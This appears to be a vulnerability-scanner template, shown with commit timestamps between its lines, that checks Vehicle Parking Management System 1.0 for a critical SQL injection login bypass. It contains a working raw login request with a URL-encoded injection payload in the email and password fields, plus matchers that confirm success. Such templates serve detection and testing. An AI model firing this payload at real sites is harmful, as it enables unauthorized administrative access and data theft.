2020-10-15 19:42:37 +00:00
id : vpms-auth-bypass
info :
2022-09-29 13:38:41 +00:00
name : Vehicle Parking Management System 1.0 - SQL Injection
2020-10-15 19:42:37 +00:00
author : dwisiswant0
2022-09-29 13:38:41 +00:00
severity : critical
description : Vehicle Parking Management System 1.0 contains a SQL injection vulnerability via the password parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/48877
2022-09-29 13:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-89
2022-08-27 04:41:18 +00:00
tags : auth-bypass,edb
2022-04-22 10:38:41 +00:00
2020-10-15 19:42:37 +00:00
requests :
- raw :
- |
POST /login.php HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type : application/x-www-form-urlencoded
2021-09-08 12:17:19 +00:00
Referer : {{BaseURL}}/login.php
2020-10-15 19:42:37 +00:00
Cookie : PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8
email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1
matchers-condition : and
matchers :
2021-04-28 12:07:39 +00:00
- type : word
words :
2020-10-15 19:42:37 +00:00
- "LAGOS PARKER"
- "Login Successfully"
- "location.href = 'index.php';"
condition : and
part : body
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28